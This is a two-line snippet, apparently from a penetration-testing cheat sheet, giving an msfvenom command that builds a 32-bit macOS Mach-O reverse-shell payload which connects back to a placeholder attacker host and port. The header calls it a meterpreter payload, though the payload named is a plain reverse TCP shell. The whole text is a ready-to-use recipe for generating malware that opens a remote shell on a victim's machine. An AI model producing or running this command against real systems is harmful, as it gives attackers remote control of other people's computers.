# 32-bit macOS MACH-O meterpreter payload # msfvenom -p osx/x86/shell_reverse_tcp \ LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \ -f macho -o ${NAME}